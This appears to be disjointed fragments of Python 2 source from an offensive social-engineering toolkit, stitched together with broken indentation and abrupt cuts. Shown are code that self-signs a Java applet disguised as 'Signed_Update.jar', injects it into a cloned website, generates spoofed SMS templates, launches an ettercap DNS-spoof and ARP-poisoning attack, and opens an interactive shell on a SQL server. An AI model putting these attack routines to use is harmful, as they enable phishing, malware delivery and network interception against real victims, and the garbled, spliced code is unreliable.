# print warning message that we need to install sun-java or openjdk
print """
This menu will allow you to import or create a valid code signing certificate for the Java Applet attack.
You will need to purchase a code signing certificate through GoDaddy, Thawte, Verisign, etc. in order to
make this work. This menu will automate the portions for you to either create the request to submit to the
certificate authority or allow you to import a code signing certificate that you may already have.
Note that purchasing a code signing certificate is somewhat difficult. It requires you to have a business name and
prove the legitimacy of that certificate. That means you have to register a business with the state and everything else.
Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
business, buy a code signing certificate, and publish an applet to be whatever you want.
"""
core.PrintError("*** WARNING ***")
core.PrintError(
"IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk"
)
core.PrintError("*** WARNING ***")
# use flag is in case someone already has a code signing certificate, in that case it bypasses the "no" answer
use_flag = 0
# prompt for a different certificate
prompt = raw_input(
core.setprompt(
"0",
"Have you already generated a code signing-certificate? [yes|no]"))
# if we selected yes if we generated a code signing certificate
if prompt == "yes" or prompt == "y":
#create Key: keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass
#sign: jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar SignedMicrosoft.jar oMicrosoft.jar signapplet
os.chdir("src/html/unsigned")
print """
Simply enter in the required fields, easy example below:
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
core.PrintError("*** WARNING ***")
core.PrintError(
"IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk"
)
core.PrintError("*** WARNING ***")
# grab keystore to use later
subprocess.Popen(
"keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass mystorepass",
shell=True).wait()
# self-sign the applet
subprocess.Popen(
"jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar signapplet",
shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)
#!/usr/bin/env python
import random
from src.core import setcore as core
try:
print("\n [****] Custom Template Generator [****]\n")
author = raw_input(core.setprompt(["7"], "Name of the author"))
filename = randomgen = random.randrange(1, 99999999999999999999)
filename = str(filename) + (".template")
origin = raw_input(core.setprompt(["7"], "Source phone # of the template"))
subject = raw_input(core.setprompt(["7"], "Subject of the template"))
body = raw_input(core.setprompt(["7"], "Body of the message"))
filewrite = file("src/templates/sms/%s" % (filename), "w")
filewrite.write("# Author: " + author + "\n#\n#\n#\n")
filewrite.write('ORIGIN=' + '"' + origin + '"\n\n')
filewrite.write('SUBJECT=' + '"' + subject + '"\n\n')
filewrite.write('BODY=' + '"' + body + '"\n')
print "\n"
filewrite.close()
except Exception, e:
core.PrintError("An error occured:")
core.PrintError("ERROR:" + str(e))
# Web Attack menu choice 7: Multi-Attack Web Method
if attack_vector == "7":
fileopen = file("config/set_config","r")
for line in fileopen:
line = line.rstrip()
match = re.search("APACHE_SERVER=ON",line)
if match:
setcore.PrintWarning("Apache mode is set to ON, you cannot use Multi-Attack Mode with Apache")
setcore.PrintWarning("Turn off APACHE_SERVER=ON in the SET_CONFIG and relaunch SET")
attack_vector = "30"
try:
attack_check = int(attack_vector)
except:
setcore.PrintError("ERROR:Invalid selection, going back to menu.")
break
if attack_check > 9:
raw_input("\n Invalid option. Press (return) to continue.")
break
# Web Attack menu choice 5: Man Left in the Middle Attack Method
if attack_vector == "5": choice3='0'
if attack_vector != "5":
###################################################
# USER INPUT: SHOW WEB ATTACK VECTORS MENU #
###################################################
if attack_vector != "8":
filewrite.write("%s A %s" % (dns_spoof, ipaddr))
# close the file
filewrite.close()
# set bridge variable to nothing
bridge = ""
# assign -M arp to arp variable
arp = "-M arp"
# grab input from user
bridge_q = raw_input(
setcore.setprompt("0", "Use bridged mode [yes|no]"))
if bridge_q == "y" or bridge_q == "yes":
bridge_int = raw_input(
setcore.setprompt("0", "Network interface for the bridge"))
bridge = "-B " + str(bridge_int)
arp = ""
setcore.PrintError("LAUNCHING ETTERCAP DNS_SPOOF ATTACK!")
# spawn a child process
os.chdir(cwd)
time.sleep(5)
filewrite = file("src/program_junk/ettercap", "w")
filewrite.write("ettercap -T -q -i %s -P dns_spoof %s %s // //" %
(interface, arp, bridge))
filewrite.close()
os.chdir(cwd)
except Exception, error:
os.chdir(cwd)
log(error)
setcore.PrintError("ERROR:An error has occured:")
print "ERROR:" + str(error)
# if we are using dsniff
# java applet attack vector
# check for java flag for multi attack
multi_java = "off"
if os.path.isfile("src/program_junk/multi_java"):
multi_java = "on"
if attack_vector == "java" or multi_java == "on":
# Here we parse through the new website and add our java applet code, its a hack for now
# Wrote this on the plane to Russia, easiest way to do this without internet access :P
print core.bcolors.RED + "[*] Injecting Java Applet attack into the newly cloned website." + core.bcolors.ENDC
# Read in newly created index.html
time.sleep(2)
if not os.path.isfile("src/program_junk/web_clone/index.html"):
# trigger error that we were unable to grab the website :(
core.PrintError(
"Unable to clone the website it appears. Email us to fix.")
sys.exit()
fileopen = file("src/program_junk/web_clone/index.html", "r")
# Read add-on for java applet
fileopen2 = file("src/webattack/web_clone/applet.database", "r")
# Write to new file with java applet added
filewrite = file("src/program_junk/web_clone/index.html.new", "w")
fileopen3 = file("src/webattack/web_clone/repeater.database", "r")
# Open the UNC EMBED
fileopen4 = file("src/webattack/web_clone/unc.database", "r")
# this is our cloned website
index_database = fileopen.read()
# this is our applet database
applet_database = fileopen2.read()
# default to sa
if sql_username == "": sql_username = "******"
sql_password = raw_input(
setcore.setprompt(["19", "21", "23"],
"Enter the password for the SQL server"))
setcore.PrintStatus("Connecting to the SQL server...")
# try connecting
# establish base counter for connection
counter = 0
try:
conn = _mssql.connect(sql_server + ":" + str(sql_port),
sql_username, sql_password)
counter = 1
except Exception, e:
print e
setcore.PrintError(
"Connection to SQL Server failed. Try again.")
# if we had a successful connection
if counter == 1:
setcore.PrintStatus(
"Dropping into a SQL shell. Type quit to exit.")
# loop forever
while 1:
# enter the sql command
sql_shell = raw_input("Enter your SQL command here: ")
if sql_shell == "quit" or sql_shell == "exit":
setcore.PrintStatus(
"Exiting the SQL shell and returning to menu.")
break
try:
# execute the query